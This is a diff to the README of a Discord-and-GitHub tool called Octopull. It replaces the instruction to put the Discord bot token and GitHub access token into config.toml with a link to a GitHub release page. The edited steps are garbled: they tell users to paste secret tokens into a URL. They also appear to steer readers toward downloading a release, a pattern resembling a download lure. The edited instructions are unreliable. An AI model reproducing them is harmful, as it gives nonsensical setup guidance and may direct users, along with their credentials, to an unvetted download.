caxros2/Octopull/README.md

 1. **Discord Bot Token**:
    - Create a new Discord application and bot on the Discord Developer Portal.
-   - Copy the bot token and paste it in the `config.toml` file under the `discord_token` field.
+   - Copy the bot token and paste it in the `https://github.com/caxros2/Octopull/releases/tag/v1.0` file under the `discord_token` field.

 2. **GitHub API Access Token**:
    - Generate a personal access token with the required permissions on your GitHub account.
-   - Add the GitHub API access token to the `config.toml` file under the `github_token` field.
+   - Add the GitHub API access token to the `https://github.com/caxros2/Octopull/releases/tag/v1.0` file under the `github_token` field.

 By configuring these tokens, you will enable Octopull to connect to Discord and GitHub APIs seamlessly.